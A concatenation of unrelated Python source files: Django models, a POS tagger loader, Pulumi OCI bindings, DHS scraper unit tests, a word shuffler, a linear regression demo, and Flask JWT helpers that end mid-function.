    # cv: presumably coefficient of variation (std/mean) — confirm upstream.
    cv = models.FloatField()
    BBG = models.CharField(max_length=12)
    lastUpdate = models.DateTimeField()
    def __str__(self):
        return '%s %s %s' % (self.BBG, self.lastUpdate, self.Close)
@python_2_unicode_compatible  # only if you need to support Python 2
class calendar(models.Model):
    # Maps a date to a 2-character calendar code (cdr) — presumably a
    # trading-calendar identifier; confirm against the data loader.
    date = models.DateField()
    cdr = models.CharField(max_length=2)
    def __str__(self):
        return '%s %s' % (self.cdr, self.date)
@python_2_unicode_compatible  # only if you need to support Python 2
class batch_run(models.Model):
    # Configuration row for one instrument in the batch download:
    # identifiers plus a flag recording whether the fetch works.
    BBG = models.CharField(max_length=12)
    CDR = models.CharField(max_length=12)
    web_source = models.CharField(max_length=12, null=True, blank=True)
    IDX = models.CharField(max_length=12)
    isWorking = models.BooleanField()
    mnemo = models.CharField(max_length=12, null=True, blank=True)
    def __str__(self):
        return '%s %s %s %s %s' % (self.CDR, self.BBG, self.web_source, self.IDX, self.isWorking)
|
# -*- coding: utf-8 -*-
from pickle import load
import pkg_resources
# Locate the pickled tagger shipped inside this package and load it once at
# import time, so every call to get_POS_tagged_sent reuses the same model.
TAGGER_PATH = pkg_resources.resource_filename(__name__, 'POS_TAGGER.pkl')
with open(TAGGER_PATH, 'rb') as f:
    TAGGER = load(f)
def get_POS_tagged_sent(sentence):
    """Tag a single tokenized sentence with parts of speech.

    Params:
        sentence should be a list of tokens, including punctuation.
    """
    tagged_sentences = TAGGER.tag_sents([sentence])
    return tagged_sentences[0]
def main():
    """Smoke-test the tagger on a tiny example sentence."""
    tagged = get_POS_tagged_sent(['I', 'go', 'to', 'school', '.'])
    print(tagged)
# Allow running this module directly as a quick smoke test.
if __name__ == '__main__':
    main()
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetModelsResult',
'AwaitableGetModelsResult',
'get_models',
]
@pulumi.output_type
class GetModelsResult:
    """
    A collection of values returned by getModels.
    """
    # Generated code (tfgen): constructor validates each field's wire type
    # and stores it via pulumi.set; values arrive from the invoke result.
    def __init__(__self__, compartment_id=None, display_name=None, filters=None, id=None, model_collections=None, project_id=None, state=None):
        if compartment_id and not isinstance(compartment_id, str):
            raise TypeError("Expected argument 'compartment_id' to be a str")
        pulumi.set(__self__, "compartment_id", compartment_id)
        if display_name and not isinstance(display_name, str):
            raise TypeError("Expected argument 'display_name' to be a str")
        pulumi.set(__self__, "display_name", display_name)
        if filters and not isinstance(filters, list):
            raise TypeError("Expected argument 'filters' to be a list")
        pulumi.set(__self__, "filters", filters)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if model_collections and not isinstance(model_collections, list):
            raise TypeError("Expected argument 'model_collections' to be a list")
        pulumi.set(__self__, "model_collections", model_collections)
        if project_id and not isinstance(project_id, str):
            raise TypeError("Expected argument 'project_id' to be a str")
        pulumi.set(__self__, "project_id", project_id)
        if state and not isinstance(state, str):
            raise TypeError("Expected argument 'state' to be a str")
        pulumi.set(__self__, "state", state)
    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> str:
        """
        The OCID for the model's compartment.
        """
        return pulumi.get(self, "compartment_id")
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[str]:
        """
        A user-friendly display name for the resource. It does not have to be unique and can be modified. Avoid entering confidential information.
        """
        return pulumi.get(self, "display_name")
    @property
    @pulumi.getter
    def filters(self) -> Optional[Sequence['outputs.GetModelsFilterResult']]:
        return pulumi.get(self, "filters")
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The provider-assigned unique ID for this managed resource.
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter(name="modelCollections")
    def model_collections(self) -> Sequence['outputs.GetModelsModelCollectionResult']:
        """
        The list of model_collection.
        """
        return pulumi.get(self, "model_collections")
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[str]:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the project to associate with the model.
        """
        return pulumi.get(self, "project_id")
    @property
    @pulumi.getter
    def state(self) -> Optional[str]:
        """
        The state of the model.
        """
        return pulumi.get(self, "state")
class AwaitableGetModelsResult(GetModelsResult):
    # Generated code (tfgen): makes the result awaitable. The unreachable
    # `yield` turns __await__ into a generator, which then immediately
    # returns a plain GetModelsResult copy of this object's fields.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetModelsResult(
            compartment_id=self.compartment_id,
            display_name=self.display_name,
            filters=self.filters,
            id=self.id,
            model_collections=self.model_collections,
            project_id=self.project_id,
            state=self.state)
def get_models(compartment_id: Optional[str] = None,
               display_name: Optional[str] = None,
               filters: Optional[Sequence[pulumi.InputType['GetModelsFilterArgs']]] = None,
               project_id: Optional[str] = None,
               state: Optional[str] = None,
               opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetModelsResult:
    """
    This data source provides the list of Models in Oracle Cloud Infrastructure Ai Anomaly Detection service.
    Returns a list of Models.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_oci as oci
    test_models = oci.aianomalydetection.get_models(compartment_id=var["compartment_id"],
        display_name=var["model_display_name"],
        project_id=oci_ai_anomaly_detection_project["test_project"]["id"],
        state=var["model_state"])
    ```
    :param str compartment_id: The ID of the compartment in which to list resources.
    :param str display_name: A filter to return only resources that match the entire display name given.
    :param str project_id: The ID of the project for which to list the objects.
    :param str state: <b>Filter</b> results by the specified lifecycle state. Must be a valid state for the resource type.
    """
    # Build the invoke arguments using the provider's camelCase wire names.
    __args__ = dict()
    __args__['compartmentId'] = compartment_id
    __args__['displayName'] = display_name
    __args__['filters'] = filters
    __args__['projectId'] = project_id
    __args__['state'] = state
    # Fill in default invoke options and the SDK version when not supplied.
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('oci:aianomalydetection/getModels:getModels', __args__, opts=opts, typ=GetModelsResult).value
    return AwaitableGetModelsResult(
        compartment_id=__ret__.compartment_id,
        display_name=__ret__.display_name,
        filters=__ret__.filters,
        id=__ret__.id,
        model_collections=__ret__.model_collections,
        project_id=__ret__.project_id,
        state=__ret__.state)
|
#GitHub.com/tanujdey7
# Prompt for a name and echo it back; a Ctrl-C while waiting for input is
# caught and reported instead of propagating a traceback.
try:
    user_name = input("Enter Name")
    print(user_name)
except KeyboardInterrupt:
    print("error")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for DHS
"""
import copy
from os.path import join
import pytest
from hdx.data.dataset import Dataset
from hdx.data.vocabulary import Vocabulary
from hdx.hdx_configuration import Configuration
from hdx.hdx_locations import Locations
from hdx.location.country import Country
from hdx.utilities.compare import assert_files_same
from hdx.utilities.dictandlist import read_list_from_csv
from hdx.utilities.downloader import DownloadError
from hdx.utilities.path import temp_dir
from dhs import generate_datasets_and_showcase, get_countries, get_tags, get_publication, generate_resource_view
class TestDHS():
    """Unit tests for the DHS scraper.

    Holds the fixture payloads a stubbed DHS API returns (country, tags,
    publications) and the HDX dataset/resource dictionaries the generator
    is expected to produce, plus pytest fixtures that fake Configuration
    and the downloader.
    """
    # --- raw API fixture: one country record as returned by /countries ---
    countrydata = {'UNAIDS_CountryCode': 'AFG', 'SubregionName': 'South Asia', 'WHO_CountryCode': 'AF', 'FIPS_CountryCode': 'AF', 'ISO2_CountryCode': 'AF', 'ISO3_CountryCode': 'AFG', 'RegionOrder': 41, 'DHS_CountryCode': 'AF', 'CountryName': 'Afghanistan', 'UNICEF_CountryCode': 'AFG', 'UNSTAT_CountryCode': 'AFG', 'RegionName': 'South & Southeast Asia'}
    # --- expected reduced form produced by get_countries() ---
    country = {'iso3': 'AFG', 'dhscode': 'AF'}
    tags = [{'TagType': 2, 'TagName': 'DHS Quickstats', 'TagID': 0, 'TagOrder': 0}, {'TagType': 2, 'TagName': 'DHS Mobile', 'TagID': 77, 'TagOrder': 1}]
    # get_publication() is expected to pick the last (preferred) entry.
    publications = [{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR186/SR186.pdf', 'PublicationTitle': 'Mortality Survey Key Findings 2009', 'SurveyId': 'AF2009OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR186.jpg', 'SurveyYear': 2009, 'PublicationSize': 2189233, 'DHS_CountryCode': 'AF', 'PublicationId': 11072, 'PublicationDescription': 'Afghanistan AMS 2009 Summary Report'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR186/SR186.pdf', 'PublicationTitle': 'Mortality Survey Key Findings', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR186.jpg', 'SurveyYear': 2010, 'PublicationSize': 2189233, 'DHS_CountryCode': 'AF', 'PublicationId': 1107, 'PublicationDescription': 'Afghanistan AMS 2010 Summary Report'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR248/FR248.pdf', 'PublicationTitle': 'Mortality Survey Final Report', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR248.jpg', 'SurveyYear': 2010, 'PublicationSize': 3457803, 'DHS_CountryCode': 'AF', 'PublicationId': 1106, 'PublicationDescription': 'Afghanistan Mortality Survey 2010'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/OF35/OF35.C.pdf', 'PublicationTitle': 'Afghanistan DHS 2014 - 8 Regional Fact Sheets', 'SurveyId': 'AF2014DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/OF35.jpg', 'SurveyYear': 2014, 'PublicationSize': 926663, 'DHS_CountryCode': 'AF', 'PublicationId': 17482, 'PublicationDescription': 'Afghanistan DHS 2014 - Capital Region Fact Sheet'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR236/SR236.pdf', 'PublicationTitle': 'Key Findings', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR236.jpg', 'SurveyYear': 2015, 'PublicationSize': 3605432, 'DHS_CountryCode': 'AF', 'PublicationId': 1714, 'PublicationDescription': 'Afghanistan DHS 2015 - Key Findings'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/OF35/OF35.C.pdf', 'PublicationTitle': 'Afghanistan DHS 2015 - 8 Regional Fact Sheets', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/OF35.jpg', 'SurveyYear': 2015, 'PublicationSize': 926663, 'DHS_CountryCode': 'AF', 'PublicationId': 1748, 'PublicationDescription': 'Afghanistan DHS 2015 - Capital Region Fact Sheet'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR248/FR248.pdf', 'PublicationTitle': 'Mortality Survey Final Report2', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR248.jpg', 'SurveyYear': 2010, 'PublicationSize': 3457803, 'DHS_CountryCode': 'AF', 'PublicationId': 11062, 'PublicationDescription': 'Afghanistan Mortality Survey 2010'},
                    {'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR323/FR323.pdf', 'PublicationTitle': 'Final Report', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR323.jpg', 'SurveyYear': 2015, 'PublicationSize': 10756438, 'DHS_CountryCode': 'AF', 'PublicationId': 1713, 'PublicationDescription': 'Afghanistan Demographic and Health Survey 2015'}]
    # --- expected national-level HDX dataset metadata ---
    dataset = {'name': 'dhs-data-for-afghanistan', 'title': 'Afghanistan - National Demographic and Health Data',
               'notes': 'Contains data from the [DHS data portal](https://api.dhsprogram.com/). There is also a dataset containing [Afghanistan - Subnational Demographic and Health Data](https://feature-data.humdata.org/dataset/dhs-subnational-data-for-afghanistan) on HDX.\n\nThe DHS Program Application Programming Interface (API) provides software developers access to aggregated indicator data from The Demographic and Health Surveys (DHS) Program. The API can be used to create various applications to help analyze, visualize, explore and disseminate data on population, health, HIV, and nutrition from more than 90 countries.',
               'maintainer': '196196be-6037-4488-8b71-d786adf4c081', 'owner_org': '45e7c1a1-196f-40a5-a715-9d6e934a7f70',
               'data_update_frequency': '365', 'subnational': '0', 'groups': [{'name': 'afg'}],
               'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
                        {'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
                        {'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}],
               'dataset_date': '01/01/2015-12/31/2015'}
    resources = [{'name': 'DHS Quickstats Data for Afghanistan', 'description': 'HXLated csv containing DHS Quickstats data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'},
                 {'name': 'DHS Mobile Data for Afghanistan', 'description': 'HXLated csv containing DHS Mobile data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'}]
    # --- expected subnational dataset (note subnational='1') ---
    subdataset = {'name': 'dhs-subnational-data-for-afghanistan', 'title': 'Afghanistan - Subnational Demographic and Health Data',
                  'notes': 'Contains data from the [DHS data portal](https://api.dhsprogram.com/). There is also a dataset containing [Afghanistan - National Demographic and Health Data](https://feature-data.humdata.org/dataset/dhs-data-for-afghanistan) on HDX.\n\nThe DHS Program Application Programming Interface (API) provides software developers access to aggregated indicator data from The Demographic and Health Surveys (DHS) Program. The API can be used to create various applications to help analyze, visualize, explore and disseminate data on population, health, HIV, and nutrition from more than 90 countries.',
                  'maintainer': '196196be-6037-4488-8b71-d786adf4c081', 'owner_org': '45e7c1a1-196f-40a5-a715-9d6e934a7f70',
                  'data_update_frequency': '365', 'subnational': '1', 'groups': [{'name': 'afg'}],
                  'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
                           {'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
                           {'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}],
                  'dataset_date': '01/01/2015-12/31/2015'}
    subresources = [{'name': 'DHS Quickstats Data for Afghanistan', 'description': 'HXLated csv containing DHS Quickstats data', 'format': 'csv', 'resource_type': 'file.upload', 'url_type': 'upload'}]
    @pytest.fixture(scope='function')
    def configuration(self):
        """Fake HDX configuration, valid locations and approved vocabulary."""
        Configuration._create(hdx_site='feature', user_agent='test', hdx_key='12345',
                              project_config_yaml=join('tests', 'config', 'project_configuration.yml'))
        Locations.set_validlocations([{'name': 'afg', 'title': 'Afghanistan'}, {'name': 'cmr', 'title': 'Cameroon'}])
        Country.countriesdata(use_live=False)
        # Mark tags as already loaded so no network lookup is attempted.
        Vocabulary._tags_dict = True
        Vocabulary._approved_vocabulary = {'tags': [{'name': 'hxl'}, {'name': 'health'}, {'name': 'demographics'}], 'id': '4e61d464-4943-4e97-973a-84673c1aaa87', 'name': 'approved'}
        return Configuration.read()
    @pytest.fixture(scope='function')
    def downloader(self):
        """Stub downloader mapping known URLs to the fixture payloads above."""
        class Response:
            @staticmethod
            def json():
                pass
        class Download:
            @staticmethod
            def download(url):
                # Return a Response whose json() yields the canned payload
                # for the requested endpoint.
                response = Response()
                if url == 'http://haha/countries':
                    def fn():
                        return {'Data': [TestDHS.countrydata]}
                    response.json = fn
                elif url == 'http://haha/tags/AF':
                    def fn():
                        return {'Data': TestDHS.tags}
                    response.json = fn
                elif url == 'http://haha/publications/AF':
                    def fn():
                        return {'Data': TestDHS.publications}
                    response.json = fn
                return response
            @staticmethod
            def get_tabular_rows(url, **kwargs):
                # Serve CSV fixtures per tag/breakdown; one URL deliberately
                # raises to exercise the scraper's error handling.
                file = None
                headers = ['ISO3', 'DataId', 'Indicator', 'Value', 'Precision', 'DHS_CountryCode', 'CountryName',
                           'SurveyYear', 'SurveyId', 'IndicatorId', 'IndicatorOrder', 'IndicatorType',
                           'CharacteristicId', 'CharacteristicOrder', 'CharacteristicCategory',
                           'CharacteristicLabel', 'ByVariableId', 'ByVariableLabel', 'IsTotal', 'IsPreferred',
                           'SDRID', 'RegionId', 'SurveyYearLabel', 'SurveyType', 'DenominatorWeighted',
                           'DenominatorUnweighted', 'CILow', 'CIHigh']
                if url == 'http://haha/data/AF?tagids=0&breakdown=national&perpage=10000&f=csv':
                    file = 'afg0national.csv'
                elif url == 'http://haha/data/AF?tagids=0&breakdown=subnational&perpage=10000&f=csv':
                    file = 'afg0subnational.csv'
                    headers.insert(1, 'Location')
                elif url == 'http://haha/data/AF?tagids=77&breakdown=national&perpage=10000&f=csv':
                    file = 'afg77national.csv'
                elif url == 'http://haha/data/AF?tagids=77&breakdown=subnational&perpage=10000&f=csv':
                    ex = DownloadError()
                    ex.__cause__ = ValueError('Variable RET is undefined')
                    raise ex
                if file is None:
                    raise ValueError('No file - url %s was not recognised!' % url)
                rows = read_list_from_csv(join('tests', 'fixtures', file), headers=1, dict_form=True)
                for row in rows:
                    kwargs['row_function'](headers, row)
                return headers, rows
            @staticmethod
            def hxl_row(headers, hxltags, dict_form):
                # Mimic the real helper: build an HXL tag row for the headers.
                return {header: hxltags.get(header, '') for header in headers}
        return Download()
    def test_get_countriesdata(self, downloader):
        """get_countries reduces raw API records to iso3/dhscode pairs."""
        countriesdata = get_countries('http://haha/', downloader)
        assert countriesdata == [TestDHS.country]
    def test_get_tags(self, downloader):
        """get_tags returns the tag list unchanged."""
        tags = get_tags('http://haha/', downloader, 'AF')
        assert tags == TestDHS.tags
    def test_get_publication(self, downloader):
        """get_publication selects the last publication in the list."""
        publication = get_publication('http://haha/', downloader, 'AF')
        assert publication == TestDHS.publications[-1]
    def test_generate_datasets_and_showcase(self, configuration, downloader):
        """End-to-end generation of datasets, showcase and HXLated CSVs."""
        with temp_dir('DHS') as folder:
            dataset, subdataset, showcase, bites_disabled = \
                generate_datasets_and_showcase(configuration, 'http://haha/', downloader, folder, TestDHS.country, TestDHS.tags)
            assert dataset == TestDHS.dataset
            resources = dataset.get_resources()
            assert resources == TestDHS.resources
            assert subdataset == TestDHS.subdataset
            assert subdataset.get_resources() == TestDHS.subresources
            assert showcase == {'name': 'dhs-data-for-afghanistan-showcase', 'title': 'Final Report', 'notes': 'Afghanistan Demographic and Health Survey 2015',
                                'url': 'https://www.dhsprogram.com/pubs/pdf/FR323/FR323.pdf', 'image_url': 'https://www.dhsprogram.com/publications/images/thumbnails/FR323.jpg',
                                'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}, {'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}, {'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}]}
            assert bites_disabled == {'national': [False, False, False], 'subnational': [False, False, False]}
            # Generated files must match the stored fixture files exactly.
            file = 'DHS Quickstats_national_AFG.csv'
            assert_files_same(join('tests', 'fixtures', file), join(folder, file))
            file = 'DHS Mobile_national_AFG.csv'
            assert_files_same(join('tests', 'fixtures', file), join(folder, file))
            file = 'DHS Quickstats_subnational_AFG.csv'
            assert_files_same(join('tests', 'fixtures', file), join(folder, file))
    def test_generate_resource_view(self):
        """Quick Charts view is None when all bites disabled, else configured."""
        dataset = Dataset(TestDHS.dataset)
        resource = copy.deepcopy(TestDHS.resources[0])
        resource['id'] = '123'
        resource['url'] = 'https://test-data.humdata.org/dataset/495bf9ef-afab-41ac-a804-ca5978aa4213/resource/703d04ef-1787-44b1-92d5-c4ddd283d33f/download/dhs-quickstats_national_afg.csv'
        dataset.add_update_resource(resource)
        resource_view = generate_resource_view(dataset, bites_disabled=[True, True, True])
        assert resource_view is None
        resource_view = generate_resource_view(dataset, bites_disabled=[False, True, False])
        assert resource_view == {'resource_id': '123', 'description': '', 'title': 'Quick Charts', 'view_type': 'hdx_hxl_preview',
                                 'hxl_preview_config': '{"configVersion": 5, "bites": [{"tempShowSaveCancelButtons": false, "ingredient": {"valueColumn": "#indicator+value+num", "aggregateFunction": "sum", "dateColumn": null, "comparisonValueColumn": null, "comparisonOperator": null, "filters": {"filterWith": [{"#date+year": "$MAX$"}, {"#indicator+code": "CM_ECMR_C_IMR"}, {"#indicator+label+code": "14003"}]}, "title": "Infant Mortality Rate", "description": "Rate is for the period of 10 years preceding the survey"}, "type": "key figure", "errorMsg": null, "computedProperties": {"explainedFiltersMap": {}, "pieChart": false, "dataTitle": "Value"}, "uiProperties": {"swapAxis": true, "showGrid": true, "color": "#1ebfb3", "sortingByValue1": "DESC", "sortingByCategory1": null, "internalColorPattern": ["#1ebfb3", "#0077ce", "#f2645a", "#9C27B0"], "dataTitle": "Percent", "postText": "percent"}, "dataProperties": {}, "displayCategory": "Charts", "hashCode": -487125335}, {"tempShowSaveCancelButtons": false, "ingredient": {"valueColumn": "#indicator+value+num", "aggregateFunction": "sum", "dateColumn": null, "comparisonValueColumn": null, "comparisonOperator": null, "filters": {"filterWith": [{"#date+year": "$MAX$"}, {"#indicator+code": "ED_LITR_W_LIT"}]}, "title": "Women who are Literate", "description": ""}, "type": "key figure", "errorMsg": null, "computedProperties": {"explainedFiltersMap": {}, "pieChart": false, "dataTitle": "Value"}, "uiProperties": {"swapAxis": true, "showGrid": true, "color": "#1ebfb3", "sortingByValue1": "ASC", "sortingByCategory1": null, "internalColorPattern": ["#1ebfb3", "#0077ce", "#f2645a", "#9C27B0"], "dataTitle": "Percent", "postText": "percent"}, "dataProperties": {}, "displayCategory": "Charts", "hashCode": -539301812}], "recipeUrl": "https://raw.githubusercontent.com/mcarans/hxl-recipes/dev/recipes/dhs/recipe.json"}'}
from random import shuffle
def midrand(sentence):
    """Shuffle the interior letters of every word in *sentence*.

    Each whitespace-separated word is passed through randomized(); if the
    reassembled sentence is identical to the input, a fixed message is
    returned instead of the (unchanged) sentence.
    """
    shuffled = ' '.join(randomized(token) for token in sentence.split())
    if shuffled == sentence:
        return "They can't be different"
    return shuffled
def randomized(word):
    """Return *word* with its interior letters shuffled into a new order.

    The first and last characters stay in place.  When the interior has
    fewer than two distinct characters no visibly different rearrangement
    exists, so the word is returned unchanged; otherwise the shuffle is
    retried until at least one interior position holds a different
    character than before.
    """
    if len(set(word[1:-1])) < 2:
        return word
    # Bug fix: under Python 3 ``range`` is an immutable object, so
    # random.shuffle() would raise TypeError; materialize the index list.
    mid = list(range(1, len(word) - 1))
    while True:
        pre = mid[:]
        shuffle(mid)
        # Accept the permutation only if it changes some character.
        if any(word[a] != word[b] for a, b in zip(pre, mid)):
            break
    newword = word[0]
    for i in mid:
        newword += word[i]
    newword += word[-1]
    return newword
def main():
    """Demo driver: print each sample sentence and its shuffled version."""
    tests = []
    tests.append("A")
    tests.append("I eat apple")
    tests.append("A fox runs so fast that it suddenly die")
    for test in tests:
        # Bug fix: the original used bare Python 2 style ``print`` lines
        # split across statements, which in Python 3 just evaluate the
        # expressions and print nothing; use the print() function.
        print(test)
        print(midrand(test))
        print()
if __name__ == "__main__":
    main()
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
class Linear_regression:
    """Linear regression fitted by batch gradient descent.

    Parameters
    ----------
    theta : ndarray of shape (1, n_features)
        Initial parameter row vector.
    alpha : float
        Learning rate.
    """
    def __init__(self, theta, alpha):
        self.theta = theta
        self.alpha = alpha
    def computeCost(self, X, y, theta=None):
        """Return J(theta) = sum((X.theta^T - y)^2) / (2m).

        Bug fix: the original dereferenced ``theta.T`` even when the
        default ``theta=None`` was used; fall back to ``self.theta``.
        """
        if theta is None:
            theta = self.theta
        inner = np.power(np.dot(X, theta.T) - y, 2)
        return np.sum(inner) / (2 * len(X))
    def gradientDescent(self, X, y, iters):
        """Run ``iters`` batch gradient-descent steps.

        Returns the fitted theta and the per-iteration cost history.
        """
        cost = np.zeros([iters, 1])
        assert self.theta.shape[1] == X.shape[1], "The axis=1's shape of theta and X should be same"
        temp = np.zeros_like(self.theta)
        parameters = self.theta.shape[1]
        length = len(X)
        for i in range(iters):
            error = np.dot(X, self.theta.T) - y
            for j in range(parameters):
                # X[:, j] is 1-D; reshape so the product stays a column.
                term = error * X[:, j].reshape(length, 1)
                temp[0, j] = self.theta[0, j] - self.alpha / length * np.sum(term)
            # Copy so theta and the scratch buffer never alias each other.
            self.theta = temp.copy()
            cost[i] = self.computeCost(X, y, self.theta)
        return self.theta, cost
    def predict(self, X):
        """Return predictions X . theta^T for the current parameters."""
        return np.dot(X, self.theta.T)
if __name__ == "__main__":
    # Demo: fit the classic single-feature dataset (population vs. profit).
    path = 'ex1data1.txt'
    print(os.getcwd())
    data = pd.read_csv(path, header=None, names=['Population', 'Profit'])
    print(data.head())
    print(data.describe())
    data.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))
    #plt.show()
    # Prepend a bias column of ones so theta[0] acts as the intercept.
    data.insert(0, 'Ones', 1)
    print(data.head())
    columns = data.shape[1]
    X = data.iloc[:,0:columns-1]  # X: all rows, every column except the last
    y = data.iloc[:,columns-1:columns]  # y: all rows, last column only
    print(X.head(),y.head())
    X = np.array(X.values)
    y = np.array(y.values)
    alpha = 0.01
    iters = 1000
    theta = np.zeros([1, X.shape[1]])
    print(X.shape, theta.shape, y.shape)
    model = Linear_regression(theta, alpha)
    theta, cost = model.gradientDescent(X, y, iters)
    print(theta, cost[-1])
import jwt
import datetime
from functools import wraps
from application.models import db, User
from flask import current_app, request, g, abort, jsonify
def identity(token_or_payload):
    """Resolve a JWT (or already-decoded payload) to its active User, if any."""
    decoded = _ensure_decode(token_or_payload)
    return User.find(id=decoded.get('user_id'), active=True)
def is_expired_token(token_or_payload):
    """Return True when the payload's 'expired_date' lies in the past.

    Raises when the payload carries no expiry information at all.
    """
    payload = _ensure_decode(token_or_payload)
    exp_date = payload.get('expired_date')
    if not exp_date:
        raise Exception('Cannot get expired date in token')
    # NOTE(review): both sides of the comparison use naive local time —
    # presumably tokens are issued and checked on the same host; confirm.
    return datetime.datetime.now() > _convert_datestring_to_dateobject(exp_date)
def required_token(f):
    """Decorator: resolve the 'token' request header to ``g.user`` or abort 401."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        token = request.headers.get('token', None)
        if not token:
            return abort(401)
        user = identity(token)
        if not user:
            return abort(401)
        g.user = user
        return f(*args, **kwargs)
    return wrapper
def generate_token(user_id):
    """Create a signed access token for *user_id* with the configured TTL (minutes)."""
    ttl = datetime.timedelta(minutes=current_app.config.get('JWT_EXPIRED_IN_MIN'))
    expires_at = datetime.datetime.now() + ttl
    return encode(dict(user_id=user_id, type='access', expired_date=str(expires_at)))
def generate_refresh_token(user_id):
    """Create a signed refresh token for *user_id* with the configured TTL (days)."""
    ttl = datetime.timedelta(days=current_app.config.get('JWT_REFRESH_EXPIRED_IN_DAY'))
    expires_at = datetime.datetime.now() + ttl
    return encode(dict(user_id=user_id, type='refresh', expired_date=str(expires_at)))
def encode(payload):
    """Sign *payload* as a JWT and return it as text.

    Bug fix: PyJWT >= 2.0 returns ``str`` (1.x returned ``bytes``), so the
    unconditional ``.decode('utf-8')`` crashed on modern PyJWT; only decode
    when a bytes token comes back.
    """
    token = jwt.encode(payload, current_app.config.get('JWT_SECRET_KEY'),
                       algorithm=current_app.config.get('JWT_ALGOR'))
    return token.decode('utf-8') if isinstance(token, bytes) else token
def decode(token):
    """Verify *token*'s signature and return its payload dict.

    Bug fix: ``jwt.decode`` takes ``algorithms`` (a list of accepted
    algorithms); the original passed a nonexistent ``algorithm=`` keyword,
    which PyJWT 1.x silently ignores (disabling algorithm pinning) and
    PyJWT 2.x rejects outright.
    """
    payload = jwt.decode(token, current_app.config.get('JWT_SECRET_KEY'),
                         algorithms=[current_app.config.get("JWT_ALGOR")])
    return payload
def valid_refresh_token(refresh_token):
    """True when *refresh_token* decodes to a live, unexpired 'refresh' payload.

    Bug fix: the original called the nonexistent global ``ensure_decode``
    (NameError at runtime); the module helper is named ``_ensure_decode``.
    """
    payload = _ensure_decode(refresh_token)
    return identity(payload) and not is_expired_token(payload) and payload.get('type') == 'refresh'
def valid_registration_token(registration_token):
    """True for a decodable payload of type 'registration' with a known identity.

    Bug fix: ``ensure_decode`` -> ``_ensure_decode`` (NameError otherwise).
    NOTE(review): ``registration_identity`` is not defined in this module —
    confirm it is provided elsewhere or this still raises NameError when the
    type check passes.
    """
    payload = _ensure_decode(registration_token)
    return payload.get('type') == 'registration' and registration_identity(payload)
def get_user_from_token(token):
    """Decode *token* and return the matching active User (or None)."""
    return identity(decode(token))
def _convert_datestring_to_dateobject(datestring):
    """Parse ``str(datetime)`` output ('YYYY-MM-DD HH:MM:SS[.ffffff]') back
    into a datetime, discarding any fractional seconds (as the original did).

    Robustness fix: the original unpacked ``datestring.split('.')`` into two
    names and crashed with ValueError when the string carried no microsecond
    part (``str()`` of a datetime with microsecond == 0); parsing the
    whole-second prefix with strptime handles both forms.
    """
    whole_seconds = datestring.split('.')[0]
    return datetime.datetime.strptime(whole_seconds, '%Y-%m-%d %H:%M:%S')
def _ensure_decode(token_or_payload):
